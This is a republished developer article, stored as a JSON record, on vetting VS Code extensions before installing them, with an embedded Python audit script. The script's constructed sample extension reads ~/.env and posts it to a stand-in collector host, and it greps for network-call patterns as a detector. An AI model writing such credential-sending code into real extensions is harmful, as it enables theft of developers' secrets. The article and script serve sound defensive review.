{"slug": "how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it", "title": "How to Actually Check if a VS Code Extension is Safe Before You Install It", "summary": "A developer has outlined a practical method for vetting VS Code extensions before installation, emphasizing that extensions run with full access to sensitive files like `.env` and SSH keys. The process includes checking the publisher ID and last-update date, examining `package.json` for `activationEvents`, grepping the source for network calls, and auditing dependencies for known vulnerabilities. Tools like VSCan can automate this review. The threat model for developer tools has shifted from theoretical to active attacks, including credential-harvesting extensions with millions of installs.", "body_md": "You're about to install a VS Code extension. Maybe it's a formatter, a linter, a theme, an AI tool. You search, you find it, it has decent reviews. You click Install.\n\nBut here's what you probably didn't check, and what almost nobody does.\n\nBefore we get into how to evaluate one, it's worth being clear about what you're giving permission for. VS Code has no permission model for extensions. Every extension runs as ordinary Node.js code in the extension host, with whatever access your own user account has, which means it can read any file you can read: your `.env` files, your SSH keys, anything else in your home directory. This isn't hypothetical. Extensions with millions of installs have been caught doing exactly these things.\n\nHere's what a 60-second review actually looks like:\n\nAnyone can publish to the VS Code Marketplace. The publisher ID is the only stable identifier: the display name can be anything, and typosquatting is real. Read the publisher ID on the Marketplace listing rather than the display name, and compare it with the publisher named on the project's own site or repo. A publisher ID like `devtools-pro-2024`, with no history behind it, is worth extra scrutiny.\n\nAn extension that hasn't been touched in 2+ years is a supply chain risk waiting to happen. Old dependencies, unmaintained code, and abandoned repos are exactly how attackers get in, either by compromising the account or injecting into a dependency.\n\nLook at the \"Last Updated\" date on the Marketplace listing. Then open the GitHub repo (if it exists) and check the actual commit history. 
Sometimes the Marketplace listing shows a recent publish date that just reflects an automated re-publish, not real maintenance.\n\nCheck `package.json` before installing. Every extension describes itself in `package.json`, which you can read in the source repo or, once installed, in the extension's folder under `~/.vscode/extensions/`. It is not a permission list: VS Code grants no fine-grained permissions, so the manifest tells you when the extension activates and what it contributes, not what it is allowed to do. Look for:\n\n- `activationEvents`: when does this extension activate? `*` means it activates as soon as VS Code starts, before you open a file or run a command. Since VS Code 1.74 the activation events for contributed commands and views are inferred, so an empty or missing list does not mean the extension never runs.\n- `contributes.commands`: what commands does it register, and do they match what the extension claims to do?\n\nAn extension that activates on `*` and makes network calls is doing something the moment you open VS Code, before you've even used it.\n\nChecking for network calls takes 2 minutes if there's a public repo. Clone it or browse it on GitHub and look for:\n\n```\nfetch(\naxios\nhttp.request\nhttps.request\nxhr\nWebSocket\n```\n\nAre those calls going to localhost, or to an external server? What data is in the request body? A linter that phones home is a red flag. A language server that connects to a known service is expected. Keep in mind that most published extensions ship a single bundled file (usually under `dist/` or `out/`), and that file, not the repo, is what actually runs on your machine, so grep the installed folder too.\n\nThe extension's own code might be clean. Its dependencies might not be. Look at the `dependencies` in `package.json` for third-party packages, then check them against known vulnerability databases (`npm audit` in the cloned repo is the quickest first pass). A single compromised npm package can turn a legitimate extension malicious overnight; this is exactly how supply chain attacks work.\n\nThis is tedious to do manually. Tools like [VSCan](https://vscan.dev) automate it: paste in an extension ID and get a report on permissions, dependency vulnerabilities, and behavioral flags in seconds.\n\nNot all of these are disqualifying, but each one deserves a second look:\n\nSome of the most dangerous extensions are the popular ones, because they're the ones attackers target. 
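
To run the review above in one pass against an extension you already have installed, here is an added example; it is not code from the original post and not part of VSCan. It reads the extension's `package.json` and shipped JavaScript from a folder under `~/.vscode/extensions/`, flags eager activation (`*` or `onStartupFinished`), lists every line matching the network-call patterns above plus `child_process`, separates localhost endpoints from external ones, and lists the declared dependencies for a separate vulnerability check. The folder layout, the pattern list, the constructed sample extension it ships with, and the flag wording are assumptions of this example.

```python
# Added example, not code from the original post or from VSCan: an offline,
# single-file version of the review above, run against one extension folder.
# Assumptions: the folder is laid out like an installed extension
# (~/.vscode/extensions/<publisher>.<name>-<version>/ with package.json at
# its root); the pattern lists, the sample extension and the flag wording are
# choices made for this example.
import json
import os
import sys

# Strings the post suggests grepping for, plus child_process (an addition
# here: a stealer that reads your keys usually also wants to run commands).
NETWORK_PATTERNS = ('fetch(', 'axios', 'http.request', 'https.request',
                    'xhr', 'XMLHttpRequest', 'WebSocket', 'child_process')
LOCAL_HOSTS = ('localhost', '127.0.0.1', '0.0.0.0', '[::1]')
# Activation events that fire with no action from the user.
EAGER_ACTIVATION = ('*', 'onStartupFinished')
SOURCE_SUFFIXES = ('.js', '.mjs', '.cjs', '.ts')
# Characters that end a URL literal: whitespace, quotes, backtick, brackets.
URL_STOP = set(' ' + chr(9) + chr(39) + chr(34) + chr(96) + '<>)]},;')


def extract_urls(line):
    '''Return the http(s)/ws(s) URL literals that appear in one source line.'''
    urls = []
    for scheme in ('https://', 'http://', 'wss://', 'ws://'):
        start = 0
        while True:
            idx = line.find(scheme, start)
            if idx < 0:
                break
            end = idx
            while end < len(line) and line[end] not in URL_STOP:
                end += 1
            urls.append(line[idx:end])
            start = end
    return urls


def is_local(url):
    '''True when the URL targets this machine (expected for a language server).'''
    return url.split('://', 1)[1].startswith(LOCAL_HOSTS)


def scan_source(files):
    '''files maps relative path -> text. Return every line matching a pattern.'''
    hits = []
    for path, text in files.items():
        if not path.endswith(SOURCE_SUFFIXES):
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            for pattern in NETWORK_PATTERNS:
                if pattern in line:
                    hits.append({'path': path, 'line': lineno,
                                 'pattern': pattern, 'urls': extract_urls(line)})
                    break
    return hits


def review(manifest, files):
    '''Combine the manifest checks and the source scan into one report.'''
    # Since VS Code 1.74 activation for contributed commands is inferred, so
    # an empty activationEvents list does not mean the extension never runs.
    events = manifest.get('activationEvents') or []
    eager = [e for e in events if e in EAGER_ACTIVATION]
    hits = scan_source(files)
    external = sorted({u for h in hits for u in h['urls'] if not is_local(u)})
    deps = sorted((manifest.get('dependencies') or {}).keys())
    flags = []
    if eager:
        flags.append(f'activates without user action: {eager}')
    if external:
        flags.append(f'talks to external hosts: {external}')
    if eager and hits:
        flags.append('eager activation plus network code: runs as soon as VS Code opens')
    return {'publisher': manifest.get('publisher', '(missing)'),
            'name': manifest.get('name', '(missing)'),
            'activation_events': events, 'eager': eager,
            'network_hits': hits, 'external_urls': external,
            'dependencies': deps,   # feed these to npm audit / a vuln database
            'flags': flags}


def load_extension_dir(root):
    '''Read package.json and the shipped source files of an installed extension.'''
    with open(os.path.join(root, 'package.json'), encoding='utf-8') as fh:
        manifest = json.load(fh)
    files = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # Bundled dependencies are checked separately (npm audit), not grepped.
        dirnames[:] = [d for d in dirnames if d != 'node_modules']
        for name in filenames:
            if name.endswith(SOURCE_SUFFIXES):
                full = os.path.join(dirpath, name)
                with open(full, encoding='utf-8', errors='replace') as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return manifest, files


# Constructed sample (not a real extension): an eager, phone-home formatter.
SAMPLE_MANIFEST = {
    'name': 'devtools-pro', 'publisher': 'devtools-pro-2024',
    'activationEvents': ['*'],
    'contributes': {'commands': [{'command': 'devtoolsPro.format', 'title': 'Format'}]},
    'dependencies': {'prettier': '^3.0.0', 'axios': '^1.6.0'},
}
SAMPLE_FILES = {
    'out/extension.js': '''const axios = require('axios');
const fs = require('fs');
function activate(context) {
  const env = fs.readFileSync(process.env.HOME + '/.env', 'utf8');
  axios.post('https://collector.example/ingest', { env });
  fetch('http://localhost:8080/status');
}
module.exports = { activate };
''',
    'README.md': 'A formatter. Docs are not scanned.',
}


def review_sample():
    return review(SAMPLE_MANIFEST, SAMPLE_FILES)


def report(result):
    '''Render a review result as plain text.'''
    lines = ['publisher: ' + result['publisher'] + '  name: ' + result['name'],
             'activationEvents: ' + str(result['activation_events']),
             'dependencies: ' + str(result['dependencies'])]
    for hit in result['network_hits']:
        lines.append('  {}:{} matched {} {}'.format(
            hit['path'], hit['line'], hit['pattern'], hit['urls']))
    lines.extend('FLAG: ' + f for f in result['flags'])
    return chr(10).join(lines)


if __name__ == '__main__':
    if len(sys.argv) > 1:
        print(report(review(*load_extension_dir(sys.argv[1]))))
    else:
        print(report(review_sample()))
```

Run it as `python3 audit_extension.py ~/.vscode/extensions/publisher.name-1.2.3` (the script name and folder are placeholders); with no argument it reviews the constructed sample, which trips all three flags. It only inspects string literals, so a URL assembled at runtime or hidden in an obfuscated bundle will not show up; treat a clean result as one input to the review, not a verdict.
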
If you have any of these installed, it's worth running a quick check.\n\nBefore installing anything new, audit what you already have:\n\n```\n# List all installed extensions, with versions\ncode --list-extensions --show-versions\n\n# Remove one you don't recognize (publisher.name, as printed above)\ncode --uninstall-extension publisher.name\n```\n\nFor anything you don't recognize or haven't used recently: uninstall first, reinstall if you actually need it.\n\nA year ago, the threat model for developer tools was mostly theoretical. It's not anymore.\n\nWe've seen self-propagating worms targeting VS Code extensions. We've seen extensions with millions of downloads caught harvesting credentials. Microsoft's own telemetry has flagged thousands of extensions with suspicious behaviors.\n\nThe attack surface is your entire development environment: your code, your credentials, your git history, your cloud provider tokens. Developers are high-value targets precisely because of what they have access to.\n\nThe VS Code Marketplace is not curated the way the iOS App Store is. It's closer to npm: anyone can publish, automated scanning catches some things but not everything, and you're largely responsible for what you run.\n\nThat's not a reason to avoid extensions. 
It's a reason to take 60 seconds before you click Install.\n\n*Check your extensions at vscan.dev*", "url": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it", "canonical_source": "https://dev.to/ishaan_agrawal/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it-3pal", "published_at": "2026-06-12 02:54:53+00:00", "updated_at": "2026-06-12 03:42:16.039792+00:00", "lang": "en", "topics": ["ai-tools", "ai-products", "ai-safety", "ai-ethics", "ai-infrastructure"], "entities": ["VS Code", "VS Code Marketplace", "GitHub"], "alternates": {"html": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it", "markdown": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it.md", "text": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it.txt", "jsonld": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it.jsonld"}}